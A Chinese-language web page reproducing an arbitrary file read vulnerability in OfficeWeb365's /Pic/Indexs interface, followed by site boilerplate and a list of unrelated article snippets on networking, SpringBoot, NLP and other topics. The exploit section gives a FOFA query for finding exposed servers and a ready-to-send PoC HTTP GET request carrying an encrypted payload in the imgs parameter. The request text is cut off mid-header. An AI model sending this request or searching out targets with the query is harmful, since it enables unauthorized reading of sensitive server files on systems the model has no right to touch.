OfficeWeb365 Indexs 任意文件读取漏洞复现

0x01 产品简介

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务,包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览,WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。

0x02 漏洞概述

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,获取服务器敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"

0x04 漏洞复现

PoC

GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchan

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/278812.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

广播信道的局域网

目录 一. 局域网的数据链路层二. 广播信道局域网三. 以太网标准四. CSMA/CD协议五. 以太网最短的帧六. 冲突解决方法-―退避算法 \quad 一. 局域网的数据链路层 \quad 局域网的特点 \quad 局域网的拓扑结构 \quad 局域网传输媒体 \quad \quad 媒体共享技术 \quad 二. 广播信道…

SpringBoot 实现Execl 导入导出

1、引包 <dependency><groupId>cn.afterturn</groupId><artifactId>easypoi-base</artifactId><version>3.0.3</version></dependency><dependency><groupId>cn.afterturn</groupId><artifactId>easy…

Python之自然语言处理库snowNLP

一、介绍 SnowNLP是一个python写的类库&#xff0c;可以方便的处理中文文本内容&#xff0c;是受到了TextBlob的启发而写的&#xff0c;由于现在大部分的自然语言处理库基本都是针对英文的&#xff0c;于是写了一个方便处理中文的类库&#xff0c;并且和TextBlob不同的是&…

Hbase详解

Hbase 概念 base 是分布式、面向列的开源数据库&#xff08;其实准确的说是面向列族&#xff09;。HDFS 为 Hbase 提供可靠的底层数据存储服务&#xff0c;MapReduce 为 Hbase 提供高性能的计算能力&#xff0c;Zookeeper 为 Hbase 提供稳定服务和 Failover 机制&#xff0c;…

帆软FineBi V6版本经验总结

帆软FineBi V6版本经验总结 BI分析出现背景 ​ 现在是一个大数据的时代&#xff0c;每时每刻都有海量的明细数据出现。这时大数据时代用户思维是&#xff1a;1、数据的爆炸式增长&#xff0c;人们比起明细数据&#xff0c;更在意样本的整体特征、相互关系。2、基于明细的“小…

如何拍摄好VR全景图片,VR全景图片后期处理有什么技巧

引言&#xff1a; VR全景图片是一种以全景视角呈现场景的图片&#xff0c;通过VR技术可以将用户带入虚拟的环境中&#xff0c;给人一种身临其境的感觉&#xff0c;那么如何才能更好的制作让人满意的全景图片呢&#xff1f; 一&#xff0e;如何拍摄好VR全景图片 1.选择合适的拍…

手机怎么下载python并安装,如何在手机上下载python

大家好&#xff0c;小编来为大家解答以下问题&#xff0c;如何在手机上下载python 3.7版本&#xff0c;手机怎么下载python并安装&#xff0c;现在让我们一起来看看吧&#xff01; 如何在手机上下载python 应用市场内搜索下载下载Python在您开始之前&#xff0c;在你的计算机将…

通过AWS Endpoints从内网访问S3

AWS S3作为非结构化数据的存储&#xff0c;经常会有内网中的app调用的需求。S3默认是走公网访问的&#xff0c;如果内网app通过公网地址访问S3并获取数据会消耗公网带宽费用。如下图所示&#xff1a; AWS 提供了一种叫做endpoints的资源&#xff0c;这种资源可以后挂S3服务&a…

日志记录、跟踪和指标

我的新书《Android App开发入门与实战》已于2020年8月由人民邮电出版社出版&#xff0c;欢迎购买。点击进入详情 日志记录、跟踪和指标是系统可观察性的三大支柱。 下图显示了它们的定义和典型架构。 记录 日志记录系统中的离散事件。例如&#xff0c;我们可以将传入请求或对…

多协议标签交换(MPLS)

目录 1.MPLS的工作原理 2.转发等价类&#xff08;FEC&#xff09; 3.MPLS首部的位置与格式 4.新一代MPLS 1.MPLS的工作原理 在传统的IP 网络中&#xff0c;分组每到达一个路由器&#xff0c;都必须查找转发表&#xff0c;并按照“最长前缀匹配”的原则找到下一跳的 IP 地址…

【无标题】《巴黎图书馆》,又发现一本书

我喜愛看的书(https://img-blog.csdnimg.cn/8cd84d33e6724f09a46831f75abe6464.jpg)在这里插入图片描述

【机器学习前置知识】Beta分布

Beta分布与二项分布的关系 Beta分布与二项分布密切相关,由二项分布扩展而来,它是用来描述一个连续型随机变量出现的概率的概率密度分布,表示为 X X X~ B e t a ( a , b ) Beta(a,b) Beta(a,b) , a 、 b a、b a、b 是形状参数。Beta分布本质上也是一个概率密度函数,只是这…

根据文法求对应的语言

技巧&#xff1a;最后得到的是终结符组成的闭包 例题&#xff1a; 文法G[S]: S-->AB A-->aAb|ab B-->Bc|&#xff0c;求对应的语言 ①S-->(aAb|ab)(Bc|) ②我们可以观察到&#xff0c;无论A-->aAb还是A-->ab&#xff0c;都一定会同时出现ab,…

Windows上ModbusTCP模拟Master与Slave工具的使用

场景 Modbus Slave 与 Modbus Poll主从设备模拟软件与Configure Virtual Serial串口模拟软件使用&#xff1a; Modebus Slave 与 Modbus Poll主从设备模拟软件与Configure Virtual Serial串口模拟软件使用_modbus poll激活-CSDN博客 数据对接协议为Modbus TCP,本地开发需要使…

java接口自动化系列(12):集成allure报告

本系列汇总&#xff0c;请查看这里&#xff1a;https://www.cnblogs.com/uncleyong/p/15867903.html pom添加依赖、属性、插件 依赖 <!-- https://mvnrepository.com/artifact/io.qameta.allure/allure-testng --><dependency><groupId>io.qameta.allure&l…

城市分站优化系统源码:提升百度关键排名 附带完整的搭建教程

城市分站优化已成为企业网络营销的重要手段&#xff0c;今天来给大家分享一款城市分站优化系统源码。 以下是部分代码示例&#xff1a; 系统特色功能一览&#xff1a; 1.多城市分站管理&#xff1a;该系统支持多个城市分站的管理&#xff0c;用户可以根据业务需求&#xff0c;…

nrm的保姆级使用教程

&#x1f4e2; 鸿蒙专栏&#xff1a;想学鸿蒙的&#xff0c;冲 &#x1f4e2; C语言专栏&#xff1a;想学C语言的&#xff0c;冲 &#x1f4e2; VUE专栏&#xff1a;想学VUE的&#xff0c;冲这里 &#x1f4e2; CSS专栏&#xff1a;想学CSS的&#xff0c;冲这里 &#x1f4…

第3课 获取并播放音频流

本课对应源文件下载链接&#xff1a; https://download.csdn.net/download/XiBuQiuChong/88680079 FFmpeg作为一套庞大的音视频处理开源工具&#xff0c;其源码有太多值得研究的地方。但对于大多数初学者而言&#xff0c;如何快速利用相关的API写出自己想要的东西才是迫切需要…

轮廓检测与处理

轮廓检测 先将图像转换成二值 gray cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 灰度图 ret, thresh cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY) # 变为二值&#xff0c;大于127置为255&#xff0c;小于100置为0.使用cv2.findContours(thresh, cv2.RETR_TREE, cv2.…

一些深度学习训练过程可视化以及绘图工具

常见的可视化方法 深度学习训练过程的可视化是一个重要的环节&#xff0c;它可以帮助研究人员和工程师更好地理解和调整他们的模型。常见的可视化方法包括&#xff1a; 损失和准确率曲线&#xff1a; 这是最常见的可视化类型&#xff0c;通常在训练过程中绘制损失函数和准确率…